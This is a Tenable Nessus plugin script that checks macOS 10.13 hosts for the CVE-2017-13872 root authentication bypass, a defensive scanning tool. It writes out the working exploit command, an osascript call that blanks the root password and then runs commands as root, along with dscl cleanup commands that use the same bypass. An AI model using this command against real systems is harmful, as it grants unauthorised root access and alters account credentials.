macOS 10.13 root Authentication Bypass Direct Check

#TRUSTED 818ae6eac077d55d14f79b57fe7861e57eb0314f3b41a94cbafa4113459adf79db72cf57b5a2ac5412535f1262587bfd131a35aa4e21dd8005df247a459d1003cb19e94038fc9e6a80adae34c52beac03f317da9e60ff9c2eb7f442bdd7515bdfb0ae95ead335be03e6d26fcd5e82b9856fedc8cbd1534702fb7c962d6fcbd25df5a2f4b8ceef8a59f35c74cfde0135b2176968ed0b7941af1bad53274a69bef0a432f3ba2dff7d974cd328bee17419ebc3d5d3878ca99535a2ff5d788ab46262122ae614caa2e6c52b3e1d1ce584210fee6f6d05fb128ee6c36a46a5aca7aa0bb5a0e0c482c105230c0ff60ca6c29300447625c9106c49f1b7a5c1dd391fb62f317969b56b8b4e237cb2346071e95eac6bc1811295a1306718dc3aee2a722c5074041e6a67c371e4e1dd269e37f1e14b2fad4bda9b1876a9a90b29b9ebe5bedc138d64aaed1738b13c4c54765b08549121f683da7bc9887d7269c0d14bf6aa6cc3bbcf285687a78fd697cf6c50c9b8290443fa62028793587bfaa82608ece59227fd1a3f36abf67d9902e4521f4f74d5d0fae91a8e015e65ab4c2f172d173ff4ade2a064f9934ec4cec6b8a0b95552b4fbe87a4cf262a731564206f73fe96a631d65d1df5daa16a554afe4875510af0639a1f5c7d3121cca77131b8a85029a3ae544d9d2ec0a71f52d2925021b82501c2cb4ad051c8106f751c5929474efd18
#TRUST-RSA-SHA256 4b311ca507cf5619a488e5d88dd7fb3e37499b8d4965ae39ba3ce7892b8272a37a58aa0bb3f82193d32f179f66f59a40a429c6f91eba1f460f6f19f5df1d74901cc6d581a54d33a20610f311742df33869ddf41cafb8f98021aa6018a80422295ec9400fec586e7a2f846e4eb96944be1d17d22338ba7886eb943bc102f5033763db2c94705f1b58e4f7d38847809f0e8f47931cbc4af53495ec030b110957daeb7789c6e9a83eb3fa7bb6b5f1a0b2b945c9cee79a6d6d9b12fc26359050e2799f5cf4f46c7e3ad795de88149866c000f4a301c6da79af31b1ee990e836c4db1a1446068b9e9cb7c2a7c3e49eda1e1bb80ff0cf55089bc48aa3b2478c57e1d1acf7ff8686dfca05e5083eab6837e917f77e8f85f0693ef1cc7d9f32f58aa92ecd1a74f6abe9b188415939691a8e3f5dc9ef8f2ab37b51f978e70accda73c8ce01028eea9f150ddacec16710b7a82d830e950e43a1ae9f228ffdd7cf36ef6e5acf7be849842bee390e50c1cfecff73820643f547a89591ee4812eabaf2c40db5fd9497111ffb5cc9f08db908e0f66c8e3815379ee74167b528e890574674afbaf7cc5f321b910b3bcff5c7e23db642d1b181ee9cc039d19f659ec86141b8585570d63922b8263b884061b193e92dcf2418fc85b6a53974af267fbc91958c921c56a5d70db71880a2b9322fdbd48875374bb9902d471fd11364099f1b4b6eea8da
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(104848);
  script_version("1.12");
  script_set_attribute(attribute:"plugin_modification_date", value:"2023/11/27");

  script_cve_id("CVE-2017-13872");
  script_bugtraq_id(101981);

  script_name(english:"macOS 10.13 root Authentication Bypass Direct Check");
  script_summary(english:"Checks if the root password can be blanked out.");

  script_set_attribute(attribute:"synopsis", value:
"The remote host is running a version of macOS that is affected by a
root authentication bypass vulnerability.");
  script_set_attribute(attribute:"description", value:
"The remote host is running a version of macOS that has a root
authentication bypass vulnerability. A local attacker or a remote
attacker with credentials for a standard user account has the ability
to blank out the root account password. This can allow an attacker to
escalate privileges to root and execute commands and read files as a
system administrator.");
  script_set_attribute(attribute:"see_also", value:"https://support.apple.com/en-us/HT208315");
  # https://objective-see.com/blog/blog_0x24.html
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?2cf4b55a");
  # https://twitter.com/lemiorhan/status/935578694541770752
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?9ff9ff45");
  # https://www.theregister.co.uk/2017/11/28/root_access_bypass_macos_high_sierra/
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?1e5890f3");
  # https://www.theverge.com/2017/11/28/16711782/apple-macos-high-sierra-critical-password-security-flaw
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?f367aab4");
  # https://support.apple.com/en-us/HT204012
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?f9f9bbc3");
  script_set_attribute(attribute:"solution", value:
"Enable the root account and set a strong root account password.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2017-13872");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'Mac OS X Root Privilege Escalation');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
  script_set_attribute(attribute:"in_the_news", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2017/11/28");
  script_set_attribute(attribute:"plugin_publication_date", value:"2017/11/29");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:apple:mac_os_x");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:apple:macos");
  script_end_attributes();

  script_category(ACT_DESTRUCTIVE_ATTACK);
  script_family(english:"MacOS X Local Security Checks");

  script_copyright(english:"This script is Copyright (C) 2017-2023 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/MacOSX/Version");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("ssh_func.inc");
include("macosx_func.inc");

enable_ssh_wrappers();

if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);

os = get_kb_item("Host/MacOSX/Version");
if (!os) audit(AUDIT_OS_NOT, "macOS");
if (os !~ "Mac OS X 10\.13([^0-9]|$)") audit(AUDIT_OS_NOT, "macOS 10.13");

# check we're not root first
results = exec_cmd(cmd:"id");
if ("uid=0(root)" >< results)
  audit(AUDIT_HOST_NOT, "affected");

id_cmd = '/usr/bin/osascript -e \'do shell script "id" user name "root" password "" with administrator privileges\'';
results = exec_cmd(cmd:id_cmd);
# if we're vuln, the first time blanks the password, second time runs id
results = exec_cmd(cmd:id_cmd);

if ("uid=0(root)" >!< results)
{
  # not vuln
  audit(AUDIT_HOST_NOT, "vulnerable either because a root password is set or the vulnerability has been patched");
}

# if we are vulnerable we need to do some cleanup to
# set the system state back to pre-exploit
# this disables the root account and resets
# the password back to not blank
cmd = '/usr/bin/osascript -e \'do shell script "dscl . -create /Users/root passwd \'\\*\'" user name "root" password "" with administrator privileges\'';
exec_cmd(cmd:cmd);
cmd = '/usr/bin/osascript -e \'do shell script "dscl . -delete /Users/root authentication_authority" user name "root" password "" with administrator privileges\'';
exec_cmd(cmd:cmd);
cmd = '/usr/bin/osascript -e \'do shell script "dscl . -delete /Users/root ShadowHashData" user name "root" password "" with administrator privileges\'';
exec_cmd(cmd:cmd);

report = '  Nessus was able to execute commands as root by\n' +
         '  first blanking the root account password and then\n' +
         '  running "id" by using this command twice:\n' +
         '\n' +
         '  ' + id_cmd + '\n' +
         '\n' +
         '  which produced the following output:\n' +
         '\n' +
         '  ' + results + '\n';

security_report_v4(port:0, severity:SECURITY_HOLE, extra:report);